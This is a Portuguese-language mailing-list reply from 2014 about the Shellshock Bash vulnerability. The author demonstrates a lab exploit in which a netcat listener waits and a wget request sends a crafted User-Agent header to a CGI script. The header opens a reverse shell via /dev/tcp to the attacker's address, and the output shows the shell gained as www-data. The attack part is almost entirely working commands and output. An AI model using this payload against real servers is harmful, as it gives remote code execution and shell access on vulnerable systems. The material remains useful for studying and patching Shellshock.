shell-script-pt
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [shell-script] Falha no Bash, "pior que o heartbleed"


From: Fernando Mercês
Subject: Re: [shell-script] Falha no Bash, "pior que o heartbleed"
Date: Fri, 26 Sep 2014 22:58:52 -0300

Fiz um lab aqui pra explorar o bash com o próprio bash =D

A máquina A (192.168.0.10) é o atacante. E a S (192.168.0.8) é um servidor com script CGI em Bash (versão vunerável claro).

Na máquina A:

$ nc -vvlp 8080
listening on [any] 8080 ...

$ wget --header="User-Agent: () { :;}; /bin/bash -c 'bash -i >& /dev/tcp/192.168.0.10/8080 0>&1'" -O /dev/null 192.168.0.8/cgi-bin/bash.cgi

E já era:

$ nc -vvlp 8080
listening on [any] 8080 ...
connect to [107.155.91.162] from bb439921.virtua.com.br [187.67.153.33] 45922
bash: cannot set terminal process group (1491): Inappropriate ioctl for device
bash: no job control in this shell
www-data@debian:/usr/lib/cgi-bin$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Sei lá o que estão fazendo todos esses servidores na internet com CGI ainda. Sofrerão... :(

Abraços.


Att,

Fernando Mercês
Linux Registered User #432779
www.mentebinaria.com.br
------------------------------------
"Ninguém pode ser escravo de sua identidade; quando surge uma possibilidade de mudança é preciso mudar". (Elliot Gould)

2014-09-25 18:54 GMT-03:00 MrBiTs address@hidden [shell-script] <address@hidden>:
 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/

Exploraçãozinha divertida para redes locais.

- --
echo
920680245503158263821824753325972325831728150312428342077412537729420364909318736253880971145983128276953696631956862757408858710644955909208239222408534030331747172248238293509539472164571738870818862971439246497991147436431430964603600458631758354381402352368220521740203494788796697543569807851284795072334480481413675418412856581412376640379241258356436205061541557366641602992820546646995466P
| dc

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQEcBAEBCAAGBQJUJI8iAAoJEG7IGPwrPKWrE6QH/iWIKJfOq0unNvsdCMPGQsey
BrvsKYxQlQJ+0EVD/hIlPc30chT2jgvv2Wz3/ypZvaCYj0YDLG9xJfKUQqqLEqz3
4fqSkChd+EN+pcLhoe2Eat6lh5wdEjdt17yXj3GqlMAb3GWkusU2lte1m4ROab8V
2tRvlSgAiwiGHZeuKUT78LzjJkjf1dpkpxWhCEyiDivdh6uMo0292F6B/JTbeM+P
fGtkNavDCITPMcQeHyxaLH/rigGFGdYBWvtfpnfHKavYbQvpE07M/uSki7W6lLvz
bEoW8ieYTkf4T8/ny/fcAZZRFsqwU3K80o/nl97AJtWkzOvuxMRAMVaViiREtYE=
=u45d
-----END PGP SIGNATURE-----



reply via email to

[Prev in Thread] Current Thread [Next in Thread]